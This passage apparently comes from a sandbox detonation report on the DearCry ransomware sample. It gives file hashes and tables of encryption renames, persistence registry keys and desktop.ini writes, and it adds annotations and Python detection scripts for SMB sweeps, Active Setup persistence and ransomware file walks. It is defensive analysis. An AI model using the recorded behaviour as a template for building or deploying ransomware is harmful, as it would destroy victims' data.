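

def parse_rows(text):
    """Return (ip, port, proto) for every table row that parses; skip the rest."""
    conns = []
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if m:
            conns.append((m.group("ip"), int(m.group("port")), m.group("proto").lower()))
    return conns


def smb_sweeps(conns, min_hosts=16):
    """Group tcp/445 targets by /24 and report subnets with >= min_hosts distinct targets.

    Only private destination ranges are considered: outbound tcp/445 to the
    Internet is a different (and separately interesting) signal. Returns
    {subnet: (distinct_hosts, share_of_subnet)} ordered by host count.
    """
    per_net = defaultdict(set)
    for ip, port, proto in conns:
        if port != 445 or proto != "tcp":
            continue
        addr = ipaddress.ip_address(ip)
        if addr.is_private:
            per_net[ipaddress.ip_network(f"{ip}/24", strict=False)].add(addr)
    hits = {
        str(net): (len(hosts), round(len(hosts) / net.num_addresses, 2))
        for net, hosts in per_net.items()
        if len(hosts) >= min_hosts
    }
    return dict(sorted(hits.items(), key=lambda kv: -kv[1][0]))


def _row(ip, port=445, proto="tcp"):
    return f"| N/A | {ip}:{port} | {proto} | |"


# Constructed sample: the report's two /24 ranges plus a DNS and an HTTPS row.
SAMPLE = "\n".join(
    [_row(f"10.127.0.{h}") for h in range(72, 255)]
    + [_row(f"10.127.255.{h}") for h in range(0, 255)]
    + [_row("10.127.0.1", 53, "udp"), _row("10.127.0.1", 443)]
)

if __name__ == "__main__":
    for net, (n, share) in smb_sweeps(parse_rows(SAMPLE)).items():
        print(f"{net}: {n} distinct tcp/445 targets ({share:.0%} of the subnet)")
```

In a real deployment the same grouping is run over the host's outbound connection log in a short time window; a workstation that reaches tcp/445 on most of a /24 within minutes is the signal, regardless of whether any of those connections succeed.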
Files
C:\Program Files (x86)\R3ADM3.txt
| MD5 | e6f001fc98cb51a0429ca5dc95f6a950 |
| SHA1 | 16a73b95d0b5408fa95c97bc9f314f1eff4902b4 |
| SHA256 | acf1bb83790c25806dd3c29e0b453002397c7fe7abc25a3470ae4e3164f9f31b |
| SHA512 | 11e65ed0e80aedb497ab40edf5d3f756b121527cb1102408cdd9f146549c849a41a16fc908bb284c920b061c6b37723117b929de150a62cd61273c40e660168c |
Analysis: behavioral24
Detonation Overview
Submitted
2024-07-07 14:07
Reported
2024-07-07 14:39
Platform
win10v2004-20240704-en
Max time kernel
280s
Max time network
1813s
Command Line
Signatures
DearCry
Renames multiple (7382) files with added filename extension
Boot or Logon Autostart Execution: Active Setup
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Active Setup\Installed Components | C:\Windows\explorer.exe | N/A |
(the row above is recorded 31 times with identical fields)
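Every row in this table is explorer.exe creating the per-user Active Setup key, which is what the shell does at logon when it reconciles HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components against the user's HKU branch; the actual persistence write for this technique (MITRE T1547.014) is a new component with a StubPath under the HKLM branch, and the report shows no such row. The following is an added example, not part of the report, that parses registry rows in the report's layout and separates that benign bookkeeping from a real StubPath write. The two HKLM rows in SAMPLE are constructed with a made-up component id and binary name, and the "Set value (str)" description is an assumed row format.

```python
"""Triage Active Setup registry rows from a sandbox report.

Added example, not part of the report. At shell start explorer.exe compares
HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\<id> with the
same path under HKU\<SID>, runs the component's StubPath once for the user
when the per-user key is missing, and then writes that per-user key. The
HKU "Key created" rows from explorer.exe in the report are therefore
normal bookkeeping. The persistence write (MITRE T1547.014) is a new
StubPath under the HKLM branch, which the report does not show; the HKLM
rows in SAMPLE are constructed with a made-up component id and binary.
"""
import re
from collections import Counter

ROW_RE = re.compile(r"^\|\s*(?P<desc>[^|]+?)\s*\|\s*(?P<ind>[^|]+?)\s*\|\s*(?P<proc>[^|]+?)\s*\|")
AS_SUBPATH = r"\software\microsoft\active setup\installed components"


def parse_rows(text):
    """Yield (description, indicator, process) for each table row."""
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if m:
            yield m.group("desc"), m.group("ind"), m.group("proc")


def classify(desc, indicator, process):
    """Label one registry row; anything outside Active Setup is 'unrelated'."""
    ind = indicator.lower()
    if AS_SUBPATH not in ind:
        return "unrelated"
    proc = process.lower().rsplit("\\", 1)[-1]
    if ind.startswith(r"\registry\machine"):
        if "\\stubpath" in ind:
            return "persistence: Active Setup StubPath written by " + proc
        return "review: HKLM Active Setup component key touched by " + proc
    if ind.startswith(r"\registry\user"):
        if proc == "explorer.exe":
            return "expected: per-user Active Setup bookkeeping by explorer.exe"
        return "review: per-user Active Setup key written by " + proc
    return "review: Active Setup path in unknown hive"


def triage(text):
    """Count rows per label so the noisy-but-benign class collapses to one line."""
    return Counter(classify(*row) for row in parse_rows(text))


# Constructed sample: two rows as in the report, two made-up HKLM rows, one Run-key row.
SAMPLE = r"""
| Key created | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Active Setup\Installed Components | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Active Setup\Installed Components | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{11111111-2222-3333-4444-555555555555} | C:\Users\Admin\AppData\Local\Temp\sample.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{11111111-2222-3333-4444-555555555555}\StubPath = "C:\Users\Admin\AppData\Local\Temp\sample.exe" | C:\Users\Admin\AppData\Local\Temp\sample.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Windows\CurrentVersion\Run | C:\Users\Admin\AppData\Local\Temp\sample.exe | N/A |
"""

if __name__ == "__main__":
    for label, n in triage(SAMPLE).most_common():
        print(f"{n:3d}  {label}")
```

On a live host the same distinction is made by diffing the HKLM Installed Components subkeys (and their StubPath values) against a known-good baseline; the HKU mirror keys are a consequence of that branch, not the place the persistence lives.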
Reads user/profile data of web browsers
Drops desktop.ini file(s)
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Public\AccountPictures\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Contacts\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Desktop\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\System Tools\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Public\Documents\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Public\Libraries\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Public\Pictures\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group1\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group2\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Music\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\Saved Pictures\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group1\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\ProgramData\Microsoft\Windows\Start Menu\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Links\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Public\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Public\Downloads\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | F:\$RECYCLE.BIN\S-1-5-21-3642458265-1901903390-453309326-1000\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Downloads\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Saved Games\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Searches\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn2\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group3\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Videos\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\$Recycle.Bin\S-1-5-21-3642458265-1901903390-453309326-1000\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Public\Desktop\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Favorites\Links\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Windows\Application Shortcuts\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Admin\OneDrive\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group2\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Favorites\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn\desktop.ini | C:\Windows\explorer.exe | N/A |
| File opened for modification | C:\Users\Admin\3D Objects\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn1\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Documents\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\Camera Roll\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group3\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | F:\$RECYCLE.BIN\S-1-5-21-3642458265-1901903390-453309326-1000\desktop.ini | C:\Windows\explorer.exe | N/A |
| File opened for modification | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Windows\History\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\1033\DataServices\DESKTOP.INI | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Public\Music\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Public\Videos\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
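Nearly every row in this table comes from the DearCry sample opening desktop.ini for writing in one folder after another across the Admin, Default and Public profiles, ProgramData, both Program Files trees and the Recycle Bin on two volumes; that breadth is the footprint of a ransomware file walk, since desktop.ini sits in almost every shell folder. explorer.exe also appears twice, which is normal. The following is an added example, not part of the report, that parses file rows in the report's layout and flags a process by the number of folders and profile roots in which it wrote desktop.ini. SAMPLE is constructed from a subset of the report's rows; the thresholds of 10 folders and 3 roots are assumptions to tune.

```python
"""Separate a ransomware file walk from ordinary shell activity in file rows.

Added example, not part of the report. Ransomware that enumerates every
file opens desktop.ini in each folder along the way, so one process
"modifying" desktop.ini across many folders and several profile roots
(Admin, Default, Public, ProgramData, Program Files, the Recycle Bin on
every volume) is the signal; explorer.exe also touches desktop.ini, but
only a handful of times in a few folders. SAMPLE is constructed from a
subset of the report's rows; the thresholds are assumptions to tune.
"""
import re
from collections import defaultdict

ROW_RE = re.compile(r"^\|\s*(?P<desc>[^|]+?)\s*\|\s*(?P<path>[^|]+?)\s*\|\s*(?P<proc>[^|]+?)\s*\|")


def parse_rows(text):
    """Yield (description, path, process) for each table row."""
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if m:
            yield m.group("desc"), m.group("path"), m.group("proc")


def profile_root(path):
    """Collapse a path to its profile root: drive + top folder, plus the user under \\Users."""
    parts = path.lower().split("\\")
    depth = 3 if len(parts) >= 3 and parts[1] == "users" else 2
    return "\\".join(parts[:depth])


def desktop_ini_walkers(rows, min_dirs=10, min_roots=3):
    """Per process: desktop.ini files opened for writing, distinct folders and
    profile roots, and whether that breadth crosses the file-walk thresholds."""
    seen = defaultdict(lambda: {"events": 0, "dirs": set(), "roots": set()})
    for desc, path, proc in rows:
        if desc != "File opened for modification" or not path.lower().endswith("\\desktop.ini"):
            continue
        s = seen[proc]
        s["events"] += 1
        s["dirs"].add(path.lower().rsplit("\\", 1)[0])
        s["roots"].add(profile_root(path))
    return {
        proc: {
            "events": s["events"],
            "dirs": len(s["dirs"]),
            "roots": len(s["roots"]),
            "flag": len(s["dirs"]) >= min_dirs and len(s["roots"]) >= min_roots,
        }
        for proc, s in seen.items()
    }


SAMPLE_EXE = r"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe"
EXPLORER = r"C:\Windows\explorer.exe"

# Constructed sample: twelve of the report's DearCry rows and its two explorer.exe rows.
SAMPLE = r"""
| File opened for modification | C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Public\AccountPictures\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Contacts\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Desktop\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\System Tools\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Public\Documents\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Music\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | F:\$RECYCLE.BIN\S-1-5-21-3642458265-1901903390-453309326-1000\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Documents\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\1033\DataServices\DESKTOP.INI | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn\desktop.ini | C:\Windows\explorer.exe | N/A |
| File opened for modification | F:\$RECYCLE.BIN\S-1-5-21-3642458265-1901903390-453309326-1000\desktop.ini | C:\Windows\explorer.exe | N/A |
"""

if __name__ == "__main__":
    for proc, s in desktop_ini_walkers(parse_rows(SAMPLE)).items():
        mark = "FLAG" if s["flag"] else "ok  "
        print(f"{mark} {proc}: {s['events']} desktop.ini writes in {s['dirs']} folders, {s['roots']} roots")
```

The breadth measure (folders and roots) matters more than the raw count: a shell or indexer can legitimately rewrite desktop.ini many times inside one profile, but it does not fan out across other users' profiles, ProgramData and the Recycle Bin on a second volume in one run.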
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\D: | C:\Windows\explorer.exe | N/A |
| File opened (read-only) | \??\F: | C:\Windows\explorer.exe | N/A |
(62 events in total: \??\D: 31 times and \??\F: 31 times, all from explorer.exe)
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Getstarted_8.2.22942.0_x64__8wekyb3d8bbwe\Assets\GetStartedAppList.targetsize-72_altform-lightunplated.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File created | C:\PROGRAM FILES\WINDOWSAPPS\MICROSOFT.VCLIBS.140.00.UWPDESKTOP_14.0.27629.0_X64__8WEKYB3D8BBWE\MICROSOFT.SYSTEM.PACKAGE.METADATA\AUTOGEN\readme.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WebpImageExtension_1.0.22753.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppList.scale-400_contrast-black.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1906.2182.0_x64__8wekyb3d8bbwe\Assets\AlarmsAppList.targetsize-16.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\uk-ua\ui-strings.js | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Media Player\Media Renderer\DMR_48.jpg | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File created | C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\ru\System.Windows.Controls.Ribbon.resources.dll.CRYPT | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\jre\bin\fxplugins.dll | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Integration\C2RManifest.Proof.Culture.msi.16.es-es.xml | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\csi.dll | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.ZuneVideo_10.19071.19011.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\contrast-black\Logo.scale-125_contrast-black.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File created | C:\Program Files\VideoLAN\VLC\plugins\stream_filter\libadf_plugin.dll.CRYPT | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File created | C:\Program Files\VideoLAN\VLC\plugins\stream_filter\libskiptags_plugin.dll.CRYPT | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_6.1908.2042.0_x64__8wekyb3d8bbwe\Common.View.UWP\Strings\fr-FR\View3d\3DViewerProductDescription-universal.xml | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File created | C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.2\Microsoft.DiaSymReader.Native.amd64.dll.CRYPT | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\bin\api-ms-win-core-localization-l1-2-0.dll | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppPackageSplashScreen.scale-150_contrast-white.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.HEIFImageExtension_1.0.22742.0_x64__8wekyb3d8bbwe\Assets\contrast-black\WideTile.scale-125_contrast-black.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\legal\jdk\mesa3d.md | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.MixedReality.Portal_2000.19081.1301.0_x64__8wekyb3d8bbwe\Assets\contrast-white\MixedRealityPortalAppList.targetsize-16_altform-unplated_contrast-white.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\Assets\Images\SkypeWideTile.scale-200_contrast-black.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\HxA-GoogleCloudCache.scale-150.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\hu-hu\ui-strings.js.CRYPT | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft\EdgeUpdate_bk\1.3.187.41\msedgeupdateres_it.dll | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\nls\fr-fr\ui-strings.js | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
